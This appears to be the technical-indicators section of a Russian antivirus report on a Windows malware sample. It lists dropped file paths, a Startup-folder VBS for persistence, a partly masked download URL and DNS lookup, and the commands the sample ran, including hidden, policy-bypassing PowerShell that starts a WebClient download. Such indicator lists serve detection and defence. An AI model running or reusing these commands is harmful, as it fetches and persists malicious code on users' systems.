Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\mstsc.vbs
- %WINDIR%\notepad.exe
- iexplore.exe
- %TEMP%\mstsc.vbs
- %TEMP%\setup.exe
- %PROGRAMDATA%\mxpqmxhlwd\083626eddd_3.0.0
- %PROGRAMDATA%\mxpqmxhlwd\cfgi
- %PROGRAMDATA%\mxpqmxhlwd\cfg
- %PROGRAMDATA%\mxpqmxhlwd\dll2
- %PROGRAMDATA%\mxpqmxhlwd\r.vbs
- %PROGRAMDATA%\mxpqmxhlwd\r.vbs
- %PROGRAMDATA%\mxpqmxhlwd\r.vbs
- http://18#.#1.157.188/min1/load5305895393572.jpg
- DNS ASK pa###bin.com
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\mstsc.vbs"
- '%TEMP%\setup.exe'
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$...
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\notepad.exe' -c "%PROGRAMDATA%\MXPqmXhLWd\cfg"
- '%WINDIR%\syswow64\cmd.exe' /C WScript "%PROGRAMDATA%\MXPqmXhLWd\r.vbs"